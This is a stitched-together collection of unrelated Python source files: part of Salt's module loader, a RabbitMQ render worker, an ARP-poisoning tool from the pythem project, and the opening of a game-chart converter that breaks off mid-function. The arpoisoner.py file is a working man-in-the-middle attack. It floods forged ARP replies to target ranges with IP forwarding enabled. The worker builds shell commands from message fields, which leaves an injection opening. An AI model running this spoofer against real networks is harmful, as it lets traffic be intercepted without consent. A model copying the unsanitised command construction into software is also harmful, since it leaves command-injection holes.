log.debug("KeyError when loading %s", module_name, exc_info=True)
except Exception: # pylint: disable=broad-except
# If the module throws an exception during __virtual__()
# then log the information and continue to the next.
log.error(
"Failed to read the virtual function for %s: %s",
self.tag,
module_name,
exc_info=True,
)
return (False, module_name, error_reason, virtual_aliases)
return (True, module_name, None, virtual_aliases)
def run(self, _func_or_method, *args, **kwargs):
"""
Run the `_func_or_method` in this loader's context
"""
self._last_context = contextvars.copy_context()
return self._last_context.run(self._run_as, _func_or_method, *args, **kwargs)
def _run_as(self, _func_or_method, *args, **kwargs):
"""
Handle setting up the context properly and call the method
"""
self.parent_loader = None
try:
current_loader = salt.loader.context.loader_ctxvar.get()
except LookupError:
current_loader = None
if current_loader is not self:
self.parent_loader = current_loader
token = salt.loader.context.loader_ctxvar.set(self)
try:
return _func_or_method(*args, **kwargs)
finally:
self.parent_loader = None
salt.loader.context.loader_ctxvar.reset(token)
def run_in_thread(self, _func_or_method, *args, **kwargs):
"""
Run the function in a new thread with the context of this loader
"""
argslist = [self, _func_or_method]
argslist.extend(args)
thread = threading.Thread(target=self.target, args=argslist, kwargs=kwargs)
thread.start()
return thread
@staticmethod
def target(loader, _func_or_method, *args, **kwargs):
loader.run(_func_or_method, *args, **kwargs)
def global_injector_decorator(inject_globals):
"""
Decorator used by the LazyLoader to inject globals into a function at
execute time.
globals
Dictionary with global variables to inject
"""
def inner_decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
with salt.utils.context.func_globals_inject(f, **inject_globals):
return f(*args, **kwargs)
return wrapper
return inner_decorator
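

# --- Illustrative sketch (not part of Salt): how global_injector_decorator is
# intended to be used. The injected name below (``__grains__`` with made-up
# contents) is an assumption for illustration only; it becomes visible as a
# global of the wrapped function solely while the call runs, via
# salt.utils.context.func_globals_inject. The helper is never called at import.
def _example_global_injection():
    injected = {"__grains__": {"os": "Linux"}}

    @global_injector_decorator(injected)
    def report_os():
        # ``__grains__`` resolves through the temporarily injected globals
        return __grains__["os"]

    return report_os()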
|
worker.py
|
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
"""Consumption side of render message queue.
Provides the interface for performing computations based on messages received
from the queue. Running a worker node is only meaningful in the context of
subscribing to a master running a queue, but once a connection is established, the
worker will continue to poll for messages until it is explicitly terminated or the
connection is closed.
Example:
To run a single worker node subscribed to 192.168.1.100:
$ python worker.py \
--master=192.168.1.100
Attributes:
FLAGS (absl.flags._flagvalues.FlagValues): Globally defined flags for worker.py.
"""
import functools
import json
import os
import shutil
import sys
import threading
from copy import copy
import pika
from absl import app, flags
dir_scripts = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
dir_root = os.path.dirname(dir_scripts)
sys.path.append(dir_root)
sys.path.append(os.path.join(dir_scripts, "util"))
import config
from network import (
copy_image_level,
download,
download_image_type,
download_image_types,
download_rig,
get_cameras,
get_frame_fns,
get_frame_name,
get_frame_range,
local_image_type_path,
local_rig_path,
remote_image_type_path,
upload,
upload_image_type,
)
from resize import resize_frames
from scripts.winrender.network import Address
from scripts.util.system_util import run_command
from setup import bin_to_flags
FLAGS = flags.FLAGS
def _run_bin(msg):
"""Runs the binary associated with the message. The execution assumes the worker is
running in a configured Docker container.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
msg_cp = copy(msg)
# The binary flag convention includes the "last" frame
msg_cp["last"] = get_frame_name(int(msg["last"]))
app_name = msg_cp["app"].split(":")[0]
relevant_flags = [flag["name"] for flag in bin_to_flags[app_name]]
cmd_flags = " ".join(
[
f"--{flag}={msg_cp[flag]}"
for flag in relevant_flags
if flag in msg_cp and msg_cp[flag] != ""
]
)
# Order is determined to prevent substrings from being accidentally replaced
input_root = msg_cp["input_root"].rstrip("/")
output_root = msg_cp["output_root"].rstrip("/")
root_order = (
[output_root, input_root]
if input_root in output_root
else [input_root, output_root]
)
root_to_docker = {
input_root: config.DOCKER_INPUT_ROOT,
output_root: config.DOCKER_OUTPUT_ROOT,
}
for root in root_order:
if not os.path.exists(root):
cmd_flags = cmd_flags.replace(root, root_to_docker[root])
bin_path = os.path.join(config.DOCKER_BUILD_ROOT, "bin", app_name + ".exe")
cmd = f"set GLOG_alsologtostderr=1 && set GLOG_stderrthreshold=0 && {bin_path} {cmd_flags}"
run_command(cmd)
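    # Illustrative example (hypothetical values): for a message such as
    #   {"app": "DerpCLI:level_0", "input_root": "/mnt/in", "output_root": "/mnt/out", ...}
    # only the flags listed in bin_to_flags["DerpCLI"] that also appear in the
    # message are emitted, e.g. "--first=000100 --last=000200". If "/mnt/in" or
    # "/mnt/out" does not exist inside the container, every occurrence of it in
    # the flag string is rewritten to config.DOCKER_INPUT_ROOT or
    # config.DOCKER_OUTPUT_ROOT before the binary is invoked.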
def _clean_worker(ran_download, ran_upload):
"""Deletes any files that were downloaded or uploaded.
Args:
ran_download (bool): Whether or not a download was performed.
ran_upload (bool): Whether or not an upload was performed.
"""
if ran_download and os.path.exists(config.DOCKER_INPUT_ROOT):
shutil.rmtree(config.DOCKER_INPUT_ROOT)
    if ran_upload and os.path.exists(config.DOCKER_OUTPUT_ROOT):
shutil.rmtree(config.DOCKER_OUTPUT_ROOT)
def generate_foreground_masks_callback(msg):
"""Runs foreground mask generation according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running foreground mask generation...")
image_types_to_level = [("color", msg["level"])]
ran_download = download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level)
ran_download |= download_image_type(
msg, "background_color", [msg["background_frame"]], msg["level"]
)
msg_cp = copy(msg)
msg_cp["color"] = local_image_type_path(msg, "color", msg["level"])
msg_cp["background_color"] = local_image_type_path(
msg, "background_color", msg["level"]
)
msg_cp["foreground_masks"] = local_image_type_path(
msg, "foreground_masks", msg["dst_level"]
)
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, "foreground_masks", level=msg["dst_level"])
_clean_worker(ran_download, ran_upload)
def resize_images_callback(msg):
"""Runs image resizing according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running image resizing...")
image_types_to_level = [(msg["image_type"], None)]
ran_download = download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level)
with open(local_rig_path(msg), "r") as f:
rig = json.load(f)
local_src_dir = local_image_type_path(msg, msg["image_type"])
local_dst_dir = local_image_type_path(
msg, config.type_to_levels_type[msg["image_type"]]
)
resize_frames(
local_src_dir, local_dst_dir, rig, msg["first"], msg["last"], msg["threshold"]
)
# Clean up workspace to prevent using too much disk space on workers
for level in msg["dst_level"]:
ran_upload = upload_image_type(msg, msg["image_type"], level=level)
_clean_worker(ran_download, ran_upload)
def depth_estimation_callback(msg):
"""Runs depth estimation according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running depth estimation...")
ran_download = False
msg_cp = copy(msg)
if msg["image_type"] == "disparity":
image_types_to_level = [("color", msg["level_start"])]
if msg["use_foreground_masks"]:
ran_download |= download_image_type(
msg, "background_disp", [msg["background_frame"]], msg["level_start"]
)
image_types_to_level.append(("foreground_masks", msg["level_start"]))
if msg["level_start"] < msg["num_levels"] - 1:
image_types_to_level.append(("disparity", msg["level_start"] + 1))
if msg["use_foreground_masks"]:
image_types_to_level.append(
("foreground_masks", msg["level_start"] + 1)
)
else:
image_types_to_level = [("background_color", msg["level_start"])]
if msg["level_start"] < msg["num_levels"] - 1:
image_types_to_level.append(("background_disp", msg["level_start"] + 1))
msg_cp["color"] = local_image_type_path(msg, "background_color_levels")
msg_cp["output_root"] = os.path.join(msg["input_root"], "background")
ran_download |= download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level)
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, msg["image_type"], level=msg["level_end"])
_clean_worker(ran_download, ran_upload)
def temporal_filter_callback(msg):
"""Runs temporal filtering according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running temporal filtering...")
# If such frames do not exist, S3 simply does not download them
msg_cp = copy(msg)
frames = get_frame_range(msg["filter_first"], msg["filter_last"])
image_types_to_level = [("color", msg["level"]), ("disparity", msg["level"])]
if msg["use_foreground_masks"]:
image_types_to_level.append(("foreground_masks", msg["level"]))
ran_download = download_rig(msg)
ran_download |= download_image_types(msg, image_types_to_level, frames)
msg_cp["disparity"] = "" # disparity_level is automatically populated by app
_run_bin(msg_cp)
processed_frames = get_frame_range(msg["first"], msg["last"])
ran_upload = upload_image_type(
msg, "disparity_time_filtered", processed_frames, level=msg["level"]
)
_clean_worker(ran_download, ran_upload)
def transfer_callback(msg):
"""Runs transfer according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running rearranging...")
rig_cameras = get_cameras(msg, "cameras")
frames = get_frame_range(msg["first"], msg["last"])
copy_image_level(
msg,
msg["src_image_type"],
msg["dst_image_type"],
rig_cameras,
frames,
msg["src_level"],
msg["dst_level"],
)
def _run_upsample(msg, run_upload=True):
"""Runs disparity upsampling according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
run_upload (bool, optional): Whether or not an upload was performed.
Returns:
tuple(bool, bool): Respectively whether or not a download and upload were performed.
"""
image_types_to_level = [(msg["image_type"], msg["level"])]
msg_cp = copy(msg)
if msg["image_type"] == "disparity":
color_image_type = "color"
image_types_to_level += [
("foreground_masks", msg["level"]),
("foreground_masks", msg["dst_level"]),
]
msg_cp["foreground_masks_in"] = local_image_type_path(
msg, "foreground_masks", msg["level"]
)
msg_cp["foreground_masks_out"] = local_image_type_path(
msg, "foreground_masks", msg["dst_level"]
)
msg_cp["background_disp"] = local_image_type_path(
msg, "background_disp", msg["dst_level"]
)
download_image_type(
msg, "background_disp", [msg["background_frame"]], msg["dst_level"]
)
msg_cp["background_disp"] = local_image_type_path(
msg, "background_disp", msg["dst_level"]
)
elif msg["image_type"] == "background_disp":
color_image_type = "background_color"
msg_cp["foreground_masks_in"] = "" # Background upsampling doesn't use masks
msg_cp["foreground_masks_out"] = ""
image_types_to_level.append((color_image_type, msg["dst_level"]))
ran_download = download_image_types(msg, image_types_to_level)
ran_download |= download_rig(msg)
msg_cp["disparity"] = local_image_type_path(msg, msg["image_type"], msg["level"])
msg_cp["output"] = local_image_type_path(
msg, config.type_to_upsample_type[msg["image_type"]]
)
msg_cp["color"] = local_image_type_path(msg, color_image_type, msg["dst_level"])
_run_bin(msg_cp)
    ran_upload = False  # stays False when run_upload is disabled
    if run_upload:
ran_upload = upload_image_type(
msg, config.type_to_upsample_type[msg["image_type"]]
)
return ran_download, ran_upload
def upsample_disparity_callback(msg):
"""Runs disparity upsampling according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running disparity upsampling...")
ran_download, ran_upload = _run_upsample(msg)
_clean_worker(ran_download, ran_upload)
def upsample_layer_disparity_callback(msg):
"""Runs disparity upsampling and layering according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Running disparity upsampling and layering...")
msg_cp = copy(msg)
msg_cp["app"] = "UpsampleDisparity"
ran_download, _ = _run_upsample(msg, run_upload=False)
ran_download |= download_image_type(
msg, config.type_to_upsample_type["background_disp"], [msg["background_frame"]]
)
msg_cp["app"] = "LayerDisparities"
msg_cp["background_disp"] = local_image_type_path(
msg, config.type_to_upsample_type["background_disp"]
)
msg_cp["foreground_disp"] = local_image_type_path(
msg, config.type_to_upsample_type["disparity"]
)
msg_cp["output"] = config.DOCKER_OUTPUT_ROOT
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, "disparity")
_clean_worker(ran_download, ran_upload)
def convert_to_binary_callback(msg):
"""Runs binary conversion according to parameters read from the message.
Args:
msg (dict[str, str]): Message received from RabbitMQ publisher.
"""
print("Converting to binary...")
msg_cp = copy(msg)
ran_download = download_rig(msg)
rig_json = os.path.basename(msg["rig"])
ext_index = rig_json.index(".")
fused_json = f"{rig_json[:ext_index]}_fused{rig_json[ext_index:]}"
if msg["run_conversion"]:
image_types_to_level = [
(msg["color_type"], None),
(msg["disparity_type"], msg["level"]),
]
msg_cp["disparity"] = local_image_type_path(
msg, msg["disparity_type"], msg["level"]
)
msg_cp["color"] = local_image_type_path(msg, msg["color_type"])
msg_cp["fused"] = "" # fusion is done independently from conversion
ran_download |= download_image_types(msg, image_types_to_level)
# If we only have color levels uploaded to S3, we fall back to level_0
if len(os.listdir(msg_cp["color"])) == 0:
ran_download = download_image_types(msg, [(msg["color_type"], 0)])
msg_cp["color"] = local_image_type_path(msg, msg["color_type"], 0)
else:
image_types_to_level = [("bin", None)]
local_fused_dir = local_image_type_path(msg, "fused")
# Paths are explicitly emptied to avoid path verifications
msg_cp["color"] = ""
msg_cp["disparity"] = ""
msg_cp["foreground_masks"] = ""
msg_cp["fused"] = local_fused_dir
ran_download |= download_image_types(msg, image_types_to_level)
ran_download |= download(
src=os.path.join(remote_image_type_path(msg, "bin"), fused_json),
dst=os.path.join(local_image_type_path(msg, "bin"), fused_json),
)
msg_cp["bin"] = local_image_type_path(msg, "bin")
os.makedirs(msg["bin"], exist_ok=True)
_run_bin(msg_cp)
if msg["run_conversion"]:
ran_upload = upload_image_type(msg, "bin")
ran_upload |= upload(
src=os.path.join(local_image_type_path(msg, "bin"), fused_json),
dst=os.path.join(remote_image_type_path(msg, "bin"), fused_json),
)
else:
# We use a raw upload since upload_image_type only handles frames but we want to
# also upload the fused json here
ran_upload = upload(
src=local_image_type_path(msg, "fused"),
dst=remote_image_type_path(msg, "fused"),
filters=["*"],
)
_clean_worker(ran_download, ran_upload)
def simple_mesh_renderer_callback(msg):
print("Generating exports...")
msg_cp = copy(msg)
frames = get_frame_range(msg_cp["first"], msg_cp["last"])
ran_download = download_rig(msg)
ran_download = download_image_type(msg, msg_cp["color_type"], frames)
ran_download |= download_image_type(msg, msg_cp["disparity_type"], frames)
msg_cp["color"] = local_image_type_path(msg, msg_cp["color_type"])
msg_cp["disparity"] = local_image_type_path(msg, msg_cp["disparity_type"])
msg_cp["output"] = local_image_type_path(msg, msg_cp["dst_image_type"])
msg_cp["position"] = '"0.0 0.0 0.0"'
msg_cp["forward"] = '"-1.0 0.0 0.0"'
msg_cp["up"] = '"0.0 0.0 1.0"'
_run_bin(msg_cp)
ran_upload = upload_image_type(msg, msg_cp["dst_image_type"], frames)
_clean_worker(ran_download, ran_upload)
def success(channel, delivery_tag):
if channel.is_open:
channel.basic_ack(delivery_tag)
channel.queue_declare(config.RESPONSE_QUEUE_NAME)
channel.basic_publish(
exchange="", routing_key=config.RESPONSE_QUEUE_NAME, body="Completed!"
)
else:
pass
def failure(channel, delivery_tag, msg):
if channel.is_open:
channel.basic_reject(delivery_tag)
channel.queue_declare(config.QUEUE_NAME)
channel.basic_publish(
exchange="",
routing_key=config.QUEUE_NAME,
body=json.dumps(msg),
properties=pika.BasicProperties(delivery_mode=2), # make message persistent
)
else:
pass
def handle_message(connection, channel, delivery_tag, body):
msg = json.loads(body.decode("utf-8"))
try:
print(f"Received {msg}")
app_name_to_callback = {
"GenerateForegroundMasks": generate_foreground_masks_callback,
"DerpCLI": depth_estimation_callback,
"TemporalBilateralFilter": temporal_filter_callback,
"Transfer": transfer_callback,
"UpsampleDisparity": upsample_disparity_callback,
"UpsampleLayer": upsample_layer_disparity_callback,
"ConvertToBinary": convert_to_binary_callback,
"SimpleMeshRenderer": simple_mesh_renderer_callback,
"Resize": resize_images_callback,
}
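        # Dispatch by prefix: msg["app"] may carry extra qualifiers after the
        # binary name (e.g. a hypothetical "DerpCLI:level_0"), so startswith()
        # is used rather than an exact key lookup.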
for app_name in app_name_to_callback:
if msg["app"].startswith(app_name):
app_name_to_callback[app_name](msg)
break
# Sends response of job completion
success_callback = functools.partial(success, channel, delivery_tag)
connection.add_callback_threadsafe(success_callback)
except Exception:
print(f"Exception triggered in {app_name}")
failure_callback = functools.partial(failure, channel, delivery_tag, msg)
connection.add_callback_threadsafe(failure_callback)
def callback(ch, method, properties, body, connection):
"""Dispatches to different callbacks based on the contents of the message.
Args:
Only the body argument is necessary. The others are imposed by Pika.
ch (pika.Channel): N/a
method (pika.spec.Basic): N/a
properties (pika.spec.BasicProperties): N/a
body (bytes): utf-8 encoded message published to the message queue.
"""
handle = threading.Thread(
target=handle_message, args=(connection, ch, method.delivery_tag, body)
)
handle.start()
def main_loop(argv):
"""Sets up the callback loop for the worker.
Args:
        argv (list[str]): List of arguments (used internally by abseil).
"""
while True:
try:
connection = pika.BlockingConnection(
pika.ConnectionParameters(FLAGS.master)
)
on_message_callback = functools.partial(callback, connection=(connection))
channel = connection.channel()
channel.queue_declare(queue=config.QUEUE_NAME)
channel.basic_qos(prefetch_count=1)
channel.basic_consume(
queue=config.QUEUE_NAME,
auto_ack=False,
on_message_callback=on_message_callback,
)
channel.start_consuming()
# Don't recover if connection was closed by broker
except pika.exceptions.ConnectionClosedByBroker:
break
# Don't recover on channel errors
except pika.exceptions.AMQPChannelError:
break
# Recover on all other connection errors
except pika.exceptions.AMQPConnectionError:
continue
if __name__ == "__main__":
# Abseil entry point app.run() expects all flags to be already defined
flags.DEFINE_string("master", None, "master IP")
# Required FLAGS.
flags.mark_flag_as_required("master")
app.run(main_loop)
|
arpoisoner.py
|
#!/usr/bin/env python2.7
# coding=UTF-8
# Copyright (c) 2016-2018 Angelo Moura
#
# This file is part of the program pythem
#
# pythem is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
from scapy.all import *
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
import threading
from time import sleep
from utils import *
class ARPspoof(object):
name = "ARP poisoner spoofer"
desc = "Use arp spoofing in order to realize a man-in-the-middle attack"
version = "0.5"
def __init__(self, gateway, targets, interface, myip, mymac):
try:
self.gateway = str(IPAddress(gateway))
except AddrFormatError as e:
print "[-] Select a valid IP address as gateway"
iptables()
set_ip_forwarding(1)
self.gateway_mac = None
self.range = False
self.targets = self.get_range(targets)
self.send = True
self.interval = 3
self.interface = interface
self.myip = myip
self.mymac = mymac
self.socket = conf.L3socket(iface=self.interface)
self.socket2 = conf.L2socket(iface=self.interface)
def start(self):
t = threading.Thread(name='ARPspoof', target=self.spoof)
t.setDaemon(True)
t.start()
def get_range(self, targets):
if targets is None:
print "[!] IP address/range was not specified, will intercept only gateway requests and not replies."
return None
try:
target_list = []
for target in targets.split(','):
if '/' in target:
self.range = True
target_list.extend(list(IPNetwork(target)))
elif '-' in target:
start_addr = IPAddress(target.split('-')[0])
try:
end_addr = IPAddress(target.split('-')[1])
ip_range = IPRange(start_addr, end_addr)
except AddrFormatError:
end_addr = list(start_addr.words)
end_addr[-1] = target.split('-')[1]
end_addr = IPAddress('.'.join(map(str, end_addr)))
ip_range = IPRange(start_addr, end_addr)
target_list.extend(list(ip_range))
else:
target_list.append(IPAddress(target))
return target_list
except AddrFormatError:
sys.exit("[!] Select a valid IP address/range as target")
def resolve_mac(self, targetip):
try:
conf.verb = 0
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op="who-has", pdst=targetip), timeout=2)
for snd, rcv in ans:
return str(rcv[Ether].src)
except socket.gaierror:
print "[!] Select a valid IP Address as target/gateway, exiting ..."
exit(0)
def spoof(self):
sleep(2)
while self.send:
if self.targets is None:
self.socket2.send(
Ether(src=self.mymac, dst="ff:ff:ff:ff:ff:ff") / ARP(hwsrc=self.mymac, psrc=self.gateway,
op="is-at"))
elif self.targets:
try:
self.gateway_mac = self.resolve_mac(self.gateway)
while not self.gateway_mac:
print "[-] Error: Couldn't retrieve MAC address from gateway, retrying..."
self.gateway_mac = self.resolve_mac(self.gateway)
except KeyboardInterrupt:
print "[!] Aborted."
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
for target in self.targets:
targetip = str(target)
if (targetip != self.myip):
targetmac = self.resolve_mac(targetip)
if targetmac is not None:
try:
self.socket.send(ARP(pdst=targetip, psrc=self.gateway, hwdst=targetmac, op="is-at"))
self.socket.send(
ARP(pdst=self.gateway, psrc=targetip, hwdst=self.gateway_mac, op="is-at"))
except Exception as e:
if "Interrupted system call" not in e:
pass
sleep(self.interval)
def stop(self):
try:
self.gateway_mac = self.resolve_mac(self.gateway)
while not self.gateway_mac:
print "[-] Error: Couldn't retrieve MAC address from gateway, retrying..."
self.gateway_mac = self.resolve_mac(self.gateway)
except KeyboardInterrupt:
print "[!] Aborted."
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
self.send = False
sleep(1)
count = 4
if self.targets is None or self.range:
print "[*] Restoring sub-net connection with {} packets".format(count)
pkt = Ether(src=self.gateway_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(hwsrc=self.gateway_mac, psrc=self.gateway,
op="is-at")
for i in range(0, count):
self.socket2.send(pkt)
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
elif self.targets:
for target in self.targets:
target_ip = str(target)
target_mac = self.resolve_mac(target_ip)
if target_mac is not None:
print "[+] Restoring connection {} <--> {} with {} packets for host".format(target_ip, self.gateway,
count)
try:
for i in range(0, count):
self.socket2.send(
Ether(src=target_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(op="is-at", pdst=self.gateway,
                                                           psrc=target_ip,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=target_mac))
self.socket2.send(
Ether(src=self.gateway_mac, dst='ff:ff:ff:ff:ff:ff') / ARP(op="is-at", pdst=targetip,
psrc=self.gateway,
hwdst="ff:ff:ff:ff:ff:ff",
hwsrc=self.gateway_mac))
except Exception as e:
if "Interrupted system call" not in e:
pass
set_ip_forwarding(0)
self.socket.close()
self.socket2.close()
return
|
converter.py
|
#!/usr/bin/env python3.7
import argparse
from collections import defaultdict
from dataclasses import dataclass
from enum import Enum, auto
from functools import total_ordering
from glob import glob
import math
import os
from os.path import splitext as splitx
import re
import shutil
import sys
import threading
import time
import traceback
from xml.etree import ElementTree
import ksh_effects
# Ticks per beat in /4 time
VOX_TICKS_PER_BEAT = 48
KSH_TICKS_PER_BEAT = 16
SLAM_TICKS = 4
FX_CHIP_SOUND_COUNT = 14
KSH_DEFAULT_FILTER_GAIN = 50
KSH_DEFAULT_SLAM_VOL = 40
EFFECT_FALLBACK_NAME = 'fallback'
AUDIO_EXTENSION = '.ogg'
FX_CHIP_SOUND_EXTENSION = '.wav'
FX_CHIP_SOUND_VOL_PERCENT = 27
MAX_MEASURES = 999
# lord forgive me
HEPBURN_ROMANIZATION = """
あ ア a \tい イ i \tう ウ u \tえ エ e \tお オ o
か カ ka \tき キ ki \tく ク ku \tけ ケ ke \tこ コ ko \tきゃ キャ kya \tきゅ キュ kyu \tきょ キョ kyo
さ サ sa \tし シ shi \tす ス su \tせ セ se \tそ ソ so \tしゃ シャ sha \tしゅ シュ shu \tしょ ショ sho
た タ ta \tち チ chi \tつ ツ tsu \tて テ te \tと ト to \tちゃ チャ cha \tちゅ チュ chu \tちょ チョ cho
な ナ na \tに ニ ni \tぬ ヌ nu \tね ネ ne \tの ノ no \tにゃ ニャ nya \tにゅ ニュ nyu \tにょ ニョ nyo
は ハ ha \tひ ヒ hi \tふ フ fu \tへ ヘ he \tほ ホ ho \tひゃ ヒャ hya \tひゅ ヒュ hyu \tひょ ヒョ hyo
ま マ ma \tみ ミ mi \tむ ム mu \tめ メ me \tも モ mo \tみゃ ミャ mya \tみゅ ミュ myu \tみょ ミョ myo
や ヤ ya \tゆ ユ yu \tよ ヨ yo \t
ら ラ ra \tり リ ri \tる ル ru \tれ レ re \tろ ロ ro \tりゃ リャ rya \tりゅ リュ ryu \tりょ リョ ryo
わ ワ wa \tゐ ヰ i \tゑ ヱ e \tを ヲ o \t
\tん ン n \t
が ガ ga \tぎ ギ gi \tぐ グ gu \tげ ゲ ge \tご ゴ go \tぎゃ ギャ gya \tぎゅ ギュ gyu \tぎょ ギョ gyo
ざ ザ za \tじ ジ ji \tず ズ zu \tぜ ゼ ze \tぞ ゾ zo \tじゃ ジャ ja \tじゅ ジュ ju \tじょ ジョ jo
だ ダ da \tぢ ヂ ji \tづ ヅ zu \tで デ de \tど ド do \tぢゃ ヂャ ja \tぢゅ ヂュ ju \tぢょ ヂョ jo
ば バ ba \tび ビ bi \tぶ ブ bu \tべ ベ be \tぼ ボ bo \tびゃ ビャ bya \tびゅ ビュ byu \tびょ ビョ byo
ぱ パ pa \tぴ ピ pi \tぷ プ pu \tぺ ペ pe \tぽ ポ po \tぴゃ ピャ pya \tぴゅ ピュ pyu \tぴょ ピョ pyo
"""
def to_path(text):
hepburn_rules = HEPBURN_ROMANIZATION.split('\n')
rules = [x.strip() for y in hepburn_rules for x in y.split('\t') if len(x.strip()) > 0]
for rule in rules:
pieces = rule.split(' ')
if len(pieces) != 3:
continue
hiragana, katakana, rōmaji = pieces
text = text.replace(hiragana, rōmaji).replace(katakana, rōmaji)
return re.sub(r'[^\w]+', '_', text, flags=re.UNICODE)
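# Illustrative behavior of to_path (derived from the table and regex above):
# kana are romanized, then any run of non-word characters collapses to "_",
# e.g. to_path('さくら mix') -> 'sakura_mix'. Note that digraphs (e.g. きゃ) are
# listed after their base kana, so the base kana rule matches first.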
class Debug:
class State(Enum):
INPUT = auto()
OUTPUT = auto()
class Level(Enum):
ABNORMALITY = 'abnormal'
WARNING = 'warning'
ERROR = 'error'
def __init__(self, exceptions_file):
self.state = None
self.input_filename = None
self.output_filename = None
self.current_line_num = 0
self.exceptions_count = {level: 0 for level in Debug.Level}
self.exceptions_file = open(exceptions_file, 'w+')
def reset(self):
for level in self.Level:
self.exceptions_count[level] = 0
def close(self):
self.exceptions_file.close()
def current_filename(self):
return self.input_filename if self.state == self.State.INPUT else self.output_filename
def record(self, level, tag, message):
self.exceptions_count[level] += 1
print(f'{self.current_filename()}:{self.current_line_num}\n{level.value} / {tag}: {message}\n',
file=self.exceptions_file)
def has_issues(self):
for level in self.Level:
if self.exceptions_count[level] > 0:
return True
return False
def record_last_exception(self, level=Level.WARNING, tag='python_exception', trace=False):
self.record(level, tag, str(sys.exc_info()[1]) + '\n\tTraceback:\n' + '\n'.join(traceback.format_tb(sys.exc_info()[2])))
def truncate(x, digits) -> float:
stepper = 10.0 ** digits
return math.trunc(stepper * x) / stepper
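# e.g. truncate(3.14159, 2) == 3.14 and truncate(-2.78, 1) == -2.7
# (truncates toward zero rather than rounding)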
class KshParseError(Exception):
pass
class TimeSignature:
def __init__(self, top, bottom):
self.top: int = top
self.bottom: int = bottom
def ticks_per_beat(self):
return int(VOX_TICKS_PER_BEAT * (4 / self.bottom))
class Timing:
# TODO Take timesig as a param
def __init__(self, measure, beat, offset):
self.measure: int = measure
self.beat: int = beat
self.offset: int = offset
def to_time_str(self):
""" Create the format string that appears in the first column of vox tracks. """
return '{:03},{:02},{:02}'.format(self.measure, self.beat, self.offset)
def diff(self, other, timesig):
return (self.measure - other.measure) * (timesig.ticks_per_beat() * timesig.top) \
+ (self.beat - other.beat) * timesig.ticks_per_beat() \
+ (self.offset - other.offset)
def add(self, ticks, timesig):
new = Timing(self.measure, self.beat, self.offset + ticks)
while new.offset >= timesig.ticks_per_beat():
new.offset -= timesig.ticks_per_beat()
new.beat += 1
while new.beat > timesig.top:
new.beat -= timesig.top
new.measure += 1
return new
def __eq__(self, other):
return self.measure == other.measure and self.beat == other.beat and self.offset == other.offset
def __hash__(self):
return hash((self.measure, self.beat, self.offset))
def __str__(self):
return '{},{},{}'.format(self.measure, self.beat, self.offset)
def __lt__(self, other):
return (self.measure, self.beat, self.offset) < (other.measure, other.beat, other.offset)
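    # Worked example (4/4 time, so ticks_per_beat() == 48): Timing(1, 4, 40)
    # advanced by 12 ticks wraps to Timing(2, 1, 4), whose to_time_str() is
    # '002,01,04'; diff() back against the original timing returns 12.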
@dataclass()
class CameraNode:
start_param: float
end_param: float
duration: int
# TODO Use mapped_enum
class SpcParam(Enum):
""" SPCONTROLLER section param. """
def to_vox_name(self):
if self == self.ROT_X:
return 'CAM_RotX'
elif self == self.RAD_I:
return 'CAM_Radi'
elif self == self.REALIZE:
return 'Realize'
elif self == self.AIRL_SCAX:
return 'AIRL_ScaX'
elif self == self.AIRR_SCAX:
return 'AIRR_ScaX'
elif self == self.TILT:
return 'Tilt'
elif self == self.LANE_Y:
return 'LaneY'
else:
return None
def is_state(self):
return self == self.LANE_Y
@classmethod
def from_ksh_name(cls, ksh_name):
if ksh_name == 'zoom_top':
return cls.ROT_X
elif ksh_name == 'zoom_bottom':
return cls.RAD_I
elif ksh_name == 'tilt':
return cls.TILT
elif ksh_name == 'lane_toggle':
return cls.LANE_Y
else:
return None
def from_ksh_value(self, val:float=0):
# Convert the ksh value to the one that will be printed to the vox.
if self == self.ROT_X:
return val / 150.0
elif self == self.RAD_I:
return val / -150.0
elif self == self.TILT:
return -val
elif self == self.LANE_Y:
return float(val)
return None
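    # Illustrative conversions: a KSH zoom_top of 300 becomes CAM_RotX 2.0
    # (300 / 150), zoom_bottom 300 becomes CAM_Radi -2.0 (300 / -150), and a
    # tilt value simply has its sign flipped.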
ROT_X = auto()
RAD_I = auto()
REALIZE = auto()
AIRL_SCAX = auto()
AIRR_SCAX = auto()
TILT = auto()
LANE_Y = auto()
@classmethod
def line_is_abnormal(cls, param, splitted):
